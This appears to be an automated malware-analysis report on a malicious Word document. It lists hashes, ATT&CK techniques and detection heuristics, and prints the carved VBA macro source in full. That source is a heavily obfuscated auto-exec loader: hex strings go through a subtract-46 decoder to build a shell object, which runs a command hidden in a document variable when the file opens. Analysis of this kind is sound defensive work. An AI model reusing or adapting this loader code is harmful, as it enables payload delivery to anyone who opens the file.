Office (OLE) malware analysis — malicious · 026c3731fd349e63

MALICIOUS

Office (OLE)

149.5 KB Created: 2018-04-20 22:46:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: e9b03b1491db2d5eda52b15a9d8e90bf SHA-1: 885f443bf223dd218df8645c19667991a0329c12 SHA-256: 026c3731fd349e63b166ee92c0af647f5f210ba1e41d3b41aeb9cbea93057be1

248 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including an auto-exec loader that uses CreateObject and execution sink functions. The presence of 'macros.bas' and the critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicate the macro's primary purpose is to download and execute a secondary payload. The specific family is not identifiable from the provided evidence.

Heuristics 10

ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Public Sub GTW_K()
    Dim D_ND As Object: Set D_ND = VBA.CreateObject(QOY_O("858191A0979EA25C8196939A9A"))
    Dim A_LOX As String
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Public Sub GTW_K()
    Dim D_ND As Object: Set D_ND = VBA.CreateObject(QOY_O("858191A0979EA25C8196939A9A"))
    Dim A_LOX As String

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

End Sub
Public Sub Document_Open()
    Application.Run QOY_O("8371767E8D827285")

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & QOY_O("8371767E8D827285")

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

End Sub
Public Sub Auto_Open()
    Application.Run QOY_O("8371767E8D827285")

Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4029 bytes
SHA-256: `008174ad1d938d8139d073975c919635d66e42447c0a88be45c9a25ed856f5ec`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 12 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Public Sub GTW_K() Dim D_ND As Object: Set D_ND = VBA.CreateObject(QOY_O("858191A0979EA25C8196939A9A")) Dim A_LOX As String A_LOX = "5C6D6DAD336C51416D6D964D6D73646D324E6D6D306D33AC437973A96D3E72366D596D344E76496D7C8A6D5B65A96D4A4880906D6F7D6D6D2E6D3C9D6D72866D6D38486D6DAC6D6D8A6D6D6D756D82578F5E6D896D64896D348E6781713C459B80AA6D6D2F4A806D78" Dim M_US As String M_US = "726D583656A6A3A16D6D426DAD6D4B6D6D72786D7B6D996D6D6D9655726D6D3F6D705F6D6D6D6D6D6D5E316D6D616B6D536D6D6D6D6D6D6D6D6D6D398A6D636D9B9F73AB57476D6D986D4A6D6D6D6F6D58714C59583F6D6D6D8667685A6D916D6D6D93466D6D3A6D4D" Dim P_S As String P_S = "6D6D6D406D6D9A6D6D46A8386D89A86D6D6D6DA9816D6D6D6D6D79566D996D405C39AA91406D91756D6B6D79496D5E386D726D6D5A6D6D2E6D31835F6D7160A36D956D6D456D959B6D6D436D77976D6D6F6DA56D6D6D6DAA923C5B5F6D6D38AC6D6D6D596D6D9CA96D" Dim M_NV As String M_NV = "6D8C6D6D896D936D6D6D6D5C97916D6D686A6D4F38506D6D413844336D5451806D4B6DA26D696D7D6D6D606D4D6D6D53626D6D6D6D69546D756D7C6D6D6D5D826D733041966D6D7C6D6DF1896D7C5F6D6D6D566D6D6D6D6D4E8B6D6D31916D6D6D3F6D6D916D918E6D" Dim YSN_V As String YSN_V = "2E6D7A6D6DA7592F92A76D6D6D5C8B6D6DAD6D6D6D8F6D547D6D6D6D57535D6D806D3E4D436D656B4B846D6D6D40636D476D6D6D6D624D6D6D6D6D95416881816E876D7AAD6D6D6D9B6D383366946D6D8A3E6D7C6D826DAD85ADAB6D6D586D31686D6D5E6D726D6D6D" Dim D_L As String D_L = "626D6D436D95606D6D576D336D33573D6D6D603F6D716D35E26D6D45A46D91A36D60976D45782E6DA06D6562456D346D7D6D6D6D737B6D3C6D6D88816D606D4E706D6D7E6D6D3F6D6D3F6DA07D6D806D6D6D5EA4A5896D686D386D35326D6D743D6D6D6D6D6D7DA96D" Dim BY_QM As String BY_QM = "6C7E98386D6D6D84456D6DAD796D6D6D926D6D386D32A936A8906D58356D6D6D6D4A996D6D6D9C6D5F6DA936A86D6D99326D9091AB6DA07A6D2F7C673F6D7D823B6D5C556D3D6DAB326D4C6DA06D6D8A53568EACAA5E6D4C6D6D626D8C556D6D6DA471566D6D6DA66D" Dim RTU_WL As String RTU_WL = "826DAAA191AA6D6D546D826D6D366D596D764A806D8FA56D3B75466D876D6D32988488939F5F6D612F656199818B6D685B6D6D8AA16D91326D83636D6D6DA16D7E435B6D6D6D6D6D6D7F6D5B396D6D826D6D6D6D6D6D6D6D8E6D6D6DA7986DA23176716D6D653AA14F" Dim DT_KNM As String DT_KNM = "3A646D6D6D6D456D6D6D4B9A6D636D6D3C806D4B9A6D6D956D7E676D836D626D6D956D626D6D6D816DA58858866D8F41846D4F786D6D8F996D7E9CAB796D3DA2756D6D6D6D99A9426D4E626B66A96D6D6D416D6D6D34AB6D7F95733577956D6D6D556D6D6D6453646E" Dim SW_M As String SW_M = "6530466D6D4D8F6D6D6D6D9C6D48416D6D776D7C896D6D726D838B9B836D6D6D746D67A26DA26D766D536D6D6D6DA66D95916D6D849030696D6D95826B30566D6D5E7B6D9E6D636DA66D8F6D6D6D696D6C8C7A6D4C6AA0AA6D6D6D866D6D5E6D6D64448B444B9F6D6D" Dim H_K As String H_K = "6D586D6D46A746976D6DA555AD6D6D416D67A56D476D745E7B6D53A4556E6D526D80756D6DA5726D67336D9DA1716977596D6D30AD676D5F6D6D6D6D316D6D6DA0706D61816DADA46DA1A16D5B6D896D503347906D46746D7A74976B4B9AA76D6D6D6D50826D6D9361" Dim RYM_J As String RYM_J = "6D6D7D36B85B6D6D6D5DA857A86D346D6F6F879E6D6D6F83406747A1946D6D6D946D60716D6D3D8F6D6D48A68A6D6D426D337B526D6E6DAB6D9E6D6D9B6D6D606D6D6DAD6D47A65F6D6DA26D6D6D816D326D8E696D6D536DAA3E69496D4C6D4A736D6D6D6D6D6D6D6D6D897C6D6DA467906D6D5B6D876D586D73376A44656DAA6D6D80846D9D6DA2946D356DA56DAD6D306D51A96D88" D_ND.Exec (QOY_O(ActiveDocument.Variables("KQSI73").Value)) End Sub Public Sub Auto_Open() Application.Run QOY_O("8371767E8D827285") End Sub Sub Workbook_Open() Application.Run "ThisWorkbook." & QOY_O("8371767E8D827285") End Sub Public Function QOY_O(ByVal D_ND As String) Dim WRZ_BD As String Dim YU_JYJ As Long For YU_JYJ = 1 To Len(D_ND) Step 2 WRZ_BD = WRZ_BD & Chr(Asc(Chr("&H" & Mid(D_ND, YU_JYJ, 2))) - 46) Next QOY_O = WRZ_BD End Function Sub UCHP_TDW() GTW_K End Sub Public Sub Document_Open() Application.Run QOY_O("8371767E8D827285") End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.